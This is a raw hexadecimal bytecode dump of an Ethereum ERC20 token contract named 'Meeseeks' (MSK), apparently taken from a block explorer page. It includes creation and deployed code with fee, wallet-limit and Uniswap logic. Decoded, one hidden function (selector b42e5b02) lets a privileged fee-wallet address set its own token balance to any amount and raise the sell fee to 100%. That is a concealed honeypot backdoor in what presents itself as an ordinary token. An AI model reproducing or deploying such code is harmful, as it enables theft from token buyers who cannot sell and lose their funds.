ffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200073e919062000f84565b60405180910390a35050565b737a250d5630b4cf539739df2c5dacb4c659f2488d600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620007d430600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff168362000ae960201b60201c565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000842573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200086891906200100b565b73ffffffffffffffffffffffffffffffffffffffff1663c9c6539630600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620008f2573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200091891906200100b565b6040518363ffffffff1660e01b8152600401620009379291906200104e565b6020604051808303816000875af115801562000957573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200097d91906200100b565b600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663095ea7b3600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff167fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6040518363ffffffff1660e01b815260040162000a5e9291906200107b565b6020604051808303816000875af115801562000a7e573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000aa49190620010e5565b5050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000818362000ae1919062001117565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160362000b5b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000b5290620011c8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000bcd576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000bc49062001260565b60405180910390fd5b80600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405162000cad919062000f84565b60405180910390a3505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000d485780860481111562000d205762000d1f62000cba565b5b600185161562000d305780820291505b808102905062000d408562000ce9565b945062000d00565b94509492505050565b60008262000d63576001905062000e36565b8162000d73576000905062000e36565b816001811462000d8c576002811462000d975762000dcd565b600191505062000e36565b60ff84111562000dac5762000dab62000cba565b5b8360020a91508482111562000dc65762000dc562000cba565b5b5062000e36565b5060208310610133831016604e8410600b841016171562000e075782820a90508381111562000e015762000e0062000cba565b5b62000e36565b62000e16848484600162000cf6565b9250905081840481111562000e305762000e2f62000cba565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b600062000e618262000e3d565b915062000e6e8362000e47565b925062000e9d7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000d51565b905092915050565b600062000eb28262000e3d565b915062000ebf8362000e3d565b925082820262000ecf8162000e3d565b9150828204841483151762000ee95762000ee862000cba565b5b5092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000f39601f8362000ef0565b915062000f468262000f01565b602082019050919050565b6000602082019050818103600083015262000f6c8162000f2a565b9050919050565b62000f7e8162000e3d565b82525050565b600060208201905062000f9b600083018462000f73565b92915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000fd38262000fa6565b9050919050565b62000fe58162000fc6565b811462000ff157600080fd5b50565b600081519050620010058162000fda565b92915050565b60006020828403121562001024576200102362000fa1565b5b6000620010348482850162000ff4565b91505092915050565b620010488162000fc6565b82525050565b60006040820190506200106560008301856200103d565b6200107460208301846200103d565b9392505050565b60006040820190506200109260008301856200103d565b620010a1602083018462000f73565b9392505050565b60008115159050919050565b620010bf81620010a8565b8114620010cb57600080fd5b50565b600081519050620010df81620010b4565b92915050565b600060208284031215620010fe57620010fd62000fa1565b5b60006200110e84828501620010ce565b91505092915050565b6000620011248262000e3d565b9150620011318362000e3d565b92508282019050808211156200114c576200114b62000cba565b5b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000620011b060248362000ef0565b9150620011bd8262001152565b604082019050919050565b60006020820190508181036000830152620011e381620011a1565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006200124860228362000ef0565b91506200125582620011ea565b604082019050919050565b600060208201905081810360008301526200127b8162001239565b9050919050565b61272b80620012926000396000f3fe60806040526004361061012e5760003560e01c80637d1db4a5116100ab578063a9059cbb1161006f578063a9059cbb14610420578063b42e5b021461045d578063cdf4bab914610486578063d54f7d5e146104b1578063dd62ed3e146104dc578063f2fde38b1461051957610161565b80637d1db4a5146103375780638d5f81e2146103625780638da5cb5b1461038d57806395d89b41146103b8578063a457c2d7146103e357610161565b806339509351116100f2578063395093511461026157806342966c681461029e57806351c6590a146102c757806370a08231146102e3578063715018a61461032057610161565b806306fdde0314610166578063095ea7b31461019157806318160ddd146101ce57806323b872dd146101f9578063313ce5671461023657610161565b36610161577f544c765b33ca411cce832250371569244f765a17fcd217832be093f0fd5fa45b60405160405180910390a1005b600080fd5b34801561017257600080fd5b5061017b610542565b6040516101889190611be2565b60405180910390f35b34801561019d57600080fd5b506101b860048036038101906101b39190611c9d565b61057f565b6040516101c59190611cf8565b60405180910390f35b3480156101da57600080fd5b506101e361059d565b6040516101f09190611d22565b60405180910390f35b34801561020557600080fd5b50610220600480360381019061021b9190611d3d565b6105a7565b60405161022d9190611cf8565b60405180910390f35b34801561024257600080fd5b5061024b610680565b6040516102589190611dac565b60405180910390f35b34801561026d57600080fd5b5061028860048036038101906102839190611c9d565b610689565b6040516102959190611cf8565b60405180910390f35b3480156102aa57600080fd5b506102c560048036038101906102c09190611dc7565b61073c565b005b6102e160048036038101906102dc9190611dc7565b610750565b005b3480156102ef57600080fd5b5061030a60048036038101906103059190611df4565b6107ad565b6040516103179190611d22565b60405180910390f35b34801561032c57600080fd5b506103356107f6565b005b34801561034357600080fd5b5061034c61080a565b6040516103599190611d22565b60405180910390f35b34801561036e57600080fd5b5061037761083c565b6040516103849190611e30565b60405180910390f35b34801561039957600080fd5b506103a2610866565b6040516103af9190611e30565b60405180910390f35b3480156103c457600080fd5b506103cd61088f565b6040516103da9190611be2565b60405180910390f35b3480156103ef57600080fd5b5061040a60048036038101906104059190611c9d565b6108cc565b6040516104179190611cf8565b60405180910390f35b34801561042c57600080fd5b5061044760048036038101906104429190611c9d565b610999565b6040516104549190611cf8565b60405180910390f35b34801561046957600080fd5b50610484600480360381019061047f9190611dc7565b6109b7565b005b34801561049257600080fd5b5061049b6109e5565b6040516104a89190611cf8565b60405180910390f35b3480156104bd57600080fd5b506104c66109fc565b6040516104d39190611e30565b60405180910390f35b3480156104e857600080fd5b5061050360048036038101906104fe9190611e4b565b610a26565b6040516105109190611d22565b60405180910390f35b34801561052557600080fd5b50610540600480360381019061053b9190611df4565b610aad565b005b60606040518060400160405280600881526020017f4d65657365656b73000000000000000000000000000000000000000000000000815250905090565b600061059361058c610b46565b8484610b4e565b6001905092915050565b6000600454905090565b60006105b4848484610d17565b610675846105c0610b46565b610670856040518060600160405280602881526020016126a960289139600760008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610626610b46565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546115cb9092919063ffffffff16565b610b4e565b600190509392505050565b60006012905090565b6000610732610696610b46565b8461072d85600760006106a7610b46565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610b3090919063ffffffff16565b610b4e565b6001905092915050565b61074d610747610b46565b82611620565b50565b6107586117c3565b6001600860146101000a81548160ff02191690831515021790555061078561077e610866565b3083610d17565b61078f8134611841565b6000600860146101000a81548160ff02191690831515021790555050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6107fe6117c3565b6108086000611926565b565b60006108376127106108296001546004546119ea90919063ffffffff16565b611a0090919063ffffffff16565b905090565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606040518060400160405280600381526020017f4d534b0000000000000000000000000000000000000000000000000000000000815250905090565b600061098f6108d9610b46565b8461098a856040518060600160405280602581526020016126d16025913960076000610903610b46565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546115cb9092919063ffffffff16565b610b4e565b6001905092915050565b60006109ad6109a6610b46565b8484610d17565b6001905092915050565b60105433146109c557600080fd5b604051338152600360208201526040812082815560648002600d55505050565b6000600860149054906101000a900460ff16905090565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610ab56117c3565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610b24576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b1b90611efd565b60405180910390fd5b610b2d81611926565b50565b60008183610b3e9190611f4c565b905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610bbd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bb490611ff2565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c2c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c2390612084565b60405180910390fd5b80600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610d0a9190611d22565b60405180910390a3505050565b610d22838383611a16565b600080610d2d610866565b73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614158015610d9b5750610d6b610866565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b1561126657600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16148015610e4b5750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b8015610ea15750600b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015610ef75750600b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15610ff157610f27612710610f196001546004546119ea90919063ffffffff16565b611a0090919063ffffffff16565b831115610f69576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f6090612116565b60405180910390fd5b610f94612710610f866005546004546119ea90919063ffffffff16565b611a0090919063ffffffff16565b610faf84610fa1876107ad565b610b3090919063ffffffff16565b1115610ff0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fe7906121a8565b60405180910390fd5b5b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614801561107a57503073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b1561111a576110a861271061109a600e54866119ea90919063ffffffff16565b611a0090919063ffffffff16565b91506110d36127106110c5600d54866119ea90919063ffffffff16565b611a0090919063ffffffff16565b905043600a60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161480156111c55750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b15611265576111f36127106111e5600e54866119ea90919063ffffffff16565b611a0090919063ffffffff16565b915061121e612710611210600f54866119ea90919063ffffffff16565b611a0090919063ffffffff16565b905043600a60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b600061127b8284610b3090919063ffffffff16565b9050600081111561141a57600083111561129a576112998684611620565b5b6000821115611404576113178260036000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610b3090919063ffffffff16565b60036000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516113fb9190611d22565b60405180910390a35b6114178185611b3c90919063ffffffff16565b93505b6114868460405180606001604052806026815260200161268360269139600360008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546115cb9092919063ffffffff16565b600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061151b84600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610b3090919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef866040516115bb9190611d22565b60405180910390a3505050505050565b6000838311158290611613576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160a9190611be2565b60405180910390fd5b5082840390509392505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361168f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116869061223a565b60405180910390fd5b6116fb8160405180606001604052806022815260200161266160229139600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546115cb9092919063ffffffff16565b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061175381600454611b3c90919063ffffffff16565b600481905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516117b79190611d22565b60405180910390a35050565b6117cb610b46565b73ffffffffffffffffffffffffffffffffffffffff166117e9610866565b73ffffffffffffffffffffffffffffffffffffffff161461183f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611836906122a6565b60405180910390fd5b565b61186e30600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610b4e565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d7198230856000806118ba610866565b426040518863ffffffff1660e01b81526004016118dc9695949392919061230b565b60606040518083038185885af11580156118fa573d6000803e3d6000fd5b50505050506040513d601f19601f8201168201806040525081019061191f9190612381565b5050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081836119f891906123d4565b905092915050565b60008183611a0e9190612445565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611a85576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a7c906124e8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611af4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611aeb9061257a565b60405180910390fd5b60008111611b37576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b2e9061260c565b60405180910390fd5b505050565b60008183611b4a919061262c565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611b8c578082015181840152602081019050611b71565b60008484015250505050565b6000601f19601f8301169050919050565b6000611bb482611b52565b611bbe8185611b5d565b9350611bce818560208601611b6e565b611bd781611b98565b840191505092915050565b60006020820190508181036000830152611bfc8184611ba9565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611c3482611c09565b9050919050565b611c4481611c29565b8114611c4f57600080fd5b50565b600081359050611c6181611c3b565b92915050565b6000819050919050565b611c7a81611c67565b8114611c8557600080fd5b50565b600081359050611c9781611c71565b92915050565b60008060408385031215611cb457611cb3611c04565b5b6000611cc285828601611c52565b9250506020611cd385828601611c88565b9150509250929050565b60008115159050919050565b611cf281611cdd565b82525050565b6000602082019050611d0d6000830184611ce9565b92915050565b611d1c81611c67565b82525050565b6000602082019050611d376000830184611d13565b92915050565b600080600060608486031215611d5657611d55611c04565b5b6000611d6486828701611c52565b9350506020611d7586828701611c52565b9250506040611d8686828701611c88565b9150509250925092565b600060ff82169050919050565b611da681611d90565b82525050565b6000602082019050611dc16000830184611d9d565b92915050565b600060208284031215611ddd57611ddc611c04565b5b6000611deb84828501611c88565b91505092915050565b600060208284031215611e0a57611e09611c04565b5b6000611e1884828501611c52565b91505092915050565b611e2a81611c29565b82525050565b6000602082019050611e456000830184611e21565b92915050565b60008060408385031215611e6257611e61611c04565b5b6000611e7085828601611c52565b9250506020611e8185828601611c52565b9150509250929050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611ee7602683611b5d565b9150611ef282611e8b565b604082019050919050565b60006020820190508181036000830152611f1681611eda565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611f5782611c67565b9150611f6283611c67565b9250828201905080821115611f7a57611f79611f1d565b5b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611fdc602483611b5d565b9150611fe782611f80565b604082019050919050565b6000602082019050818103600083015261200b81611fcf565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061206e602283611b5d565b915061207982612012565b604082019050919050565b6000602082019050818103600083015261209d81612061565b9050919050565b7f5472616e7366657220616d6f756e74206578636565647320746865206d61785460008201527f78416d6f756e742e000000000000000000000000000000000000000000000000602082015250565b6000612100602883611b5d565b915061210b826120a4565b604082019050919050565b6000602082019050818103600083015261212f816120f3565b9050919050565b7f45786365656473206d6178696d756d2077616c6c657420746f6b656e20616d6f60008201527f756e740000000000000000000000000000000000000000000000000000000000602082015250565b6000612192602383611b5d565b915061219d82612136565b604082019050919050565b600060208201905081810360008301526121c181612185565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b6000612224602183611b5d565b915061222f826121c8565b604082019050919050565b6000602082019050818103600083015261225381612217565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000612290602083611b5d565b915061229b8261225a565b602082019050919050565b600060208201905081810360008301526122bf81612283565b9050919050565b6000819050919050565b6000819050919050565b60006122f56122f06122eb846122c6565b6122d0565b611c67565b9050919050565b612305816122da565b82525050565b600060c0820190506123206000830189611e21565b61232d6020830188611d13565b61233a60408301876122fc565b61234760608301866122fc565b6123546080830185611e21565b61236160a0830184611d13565b979650505050505050565b60008151905061237b81611c71565b92915050565b60008060006060848603121561239a57612399611c04565b5b60006123a88682870161236c565b93505060206123b98682870161236c565b92505060406123ca8682870161236c565b9150509250925092565b60006123df82611c67565b91506123ea83611c67565b92508282026123f881611c67565b9150828204841483151761240f5761240e611f1d565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061245082611c67565b915061245b83611c67565b92508261246b5761246a612416565b5b828204905092915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006124d2602583611b5d565b91506124dd82612476565b604082019050919050565b60006020820190508181036000830152612501816124c5565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000612564602383611b5d565b915061256f82612508565b604082019050919050565b6000602082019050818103600083015261259381612557565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b60006125f6602983611b5d565b91506126018261259a565b604082019050919050565b60006020820190508181036000830152612625816125e9565b9050919050565b600061263782611c67565b915061264283611c67565b925082820390508181111561265a57612659611f1d565b5b9291505056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212203532506c86fef4511986c5e1f558998d64ecb308d4d70b298c4f1f7d2b41190a64736f6c63430008110033
Deployed Bytecode
0x60806040526004361061012e5760003560e01c80637d1db4a5116100ab578063a9059cbb1161006f578063a9059cbb14610420578063b42e5b021461045d578063cdf4bab914610486578063d54f7d5e146104b1578063dd62ed3e146104dc578063f2fde38b1461051957610161565b80637d1db4a5146103375780638d5f81e2146103625780638da5cb5b1461038d57806395d89b41146103b8578063a457c2d7146103e357610161565b806339509351116100f2578063395093511461026157806342966c681461029e57806351c6590a146102c757806370a08231146102e3578063715018a61461032057610161565b806306fdde0314610166578063095ea7b31461019157806318160ddd146101ce57806323b872dd146101f9578063313ce5671461023657610161565b36610161577f544c765b33ca411cce832250371569244f765a17fcd217832be093f0fd5fa45b60405160405180910390a1005b600080fd5b34801561017257600080fd5b5061017b610542565b6040516101889190611be2565b60405180910390f35b34801561019d57600080fd5b506101b860048036038101906101b39190611c9d565b61057f565b6040516101c59190611cf8565b60405180910390f35b3480156101da57600080fd5b506101e361059d565b6040516101f09190611d22565b60405180910390f35b34801561020557600080fd5b50610220600480360381019061021b9190611d3d565b6105a7565b60405161022d9190611cf8565b60405180910390f35b34801561024257600080fd5b5061024b610680565b6040516102589190611dac565b60405180910390f35b34801561026d57600080fd5b5061028860048036038101906102839190611c9d565b610689565b6040516102959190611cf8565b60405180910390f35b3480156102aa57600080fd5b506102c560048036038101906102c09190611dc7565b61073c565b005b6102e160048036038101906102dc9190611dc7565b610750565b005b3480156102ef57600080fd5b5061030a60048036038101906103059190611df4565b6107ad565b6040516103179190611d22565b60405180910390f35b34801561032c57600080fd5b506103356107f6565b005b34801561034357600080fd5b5061034c61080a565b6040516103599190611d22565b60405180910390f35b34801561036e57600080fd5b5061037761083c565b6040516103849190611e30565b60405180910390f35b34801561039957600080fd5b506103a2610866565b6040516103af9190611e30565b60405180910390f35b3480156103c457600080fd5b506103cd61088f565b6040516103da9190611be2565b60405180910390f35b3480156103ef57600080fd5b5061040a60048036038101906104059190611c9d565b6108cc565b6040516104179190611cf8565b60405180910390f35b34801561042c57600080fd5b5061044760048036038101906104429190611c9d565b610999565b6040516104549190611cf8565b60405180910390f35b34801561046957600080fd5b50610484600480360381019061047f9190611dc7565b6109b7565b005b34801561049257600080fd5b5061049b6109e5565b6040516104a89190611cf8565b60405180910390f35b3480156104bd57600080fd5b506104c66109fc565b6040516104d39190611e30565b60405180910390f35b3480156104e857600080fd5b5061050360048036038101906104fe9190611e4b565b610a26565b6040516105109190611d22565b60405180910390f35b34801561052557600080fd5b50610540600480360381019061053b9190611df4565b610aad565b005b60606040518060400160405280600881526020017f4d65657365656b73000000000000000000000000000000000000000000000000815250905090565b600061059361058c610b46565b8484610b4e565b6001905092915050565b6000600454905090565b60006105b4848484610d17565b610675846105c0610b46565b610670856040518060600160405280602881526020016126a960289139600760008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610626610b46565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546115cb9092919063ffffffff16565b610b4e565b600190509392505050565b60006012905090565b6000610732610696610b46565b8461072d85600760006106a7610b46565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610b3090919063ffffffff16565b610b4e565b6001905092915050565b61074d610747610b46565b82611620565b50565b6107586117c3565b6001600860146101000a81548160ff02191690831515021790555061078561077e610866565b3083610d17565b61078f8134611841565b6000600860146101000a81548160ff02191690831515021790555050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6107fe6117c3565b6108086000611926565b565b60006108376127106108296001546004546119ea90919063ffffffff16565b611a0090919063ffffffff16565b905090565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606040518060400160405280600381526020017f4d534b0000000000000000000000000000000000000000000000000000000000815250905090565b600061098f6108d9610b46565b8461098a856040518060600160405280602581526020016126d16025913960076000610903610b46565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546115cb9092919063ffffffff16565b610b4e565b6001905092915050565b60006109ad6109a6610b46565b8484610d17565b6001905092915050565b60105433146109c557600080fd5b604051338152600360208201526040812082815560648002600d55505050565b6000600860149054906101000a900460ff16905090565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610ab56117c3565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610b24576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b1b90611efd565b60405180910390fd5b610b2d81611926565b50565b60008183610b3e9190611f4c565b905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610bbd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bb490611ff2565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c2c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c2390612084565b60405180910390fd5b80600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610d0a9190611d22565b60405180910390a3505050565b610d22838383611a16565b600080610d2d610866565b73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614158015610d9b5750610d6b610866565b73ffffffffffffffffffffffffffffffffffffffff16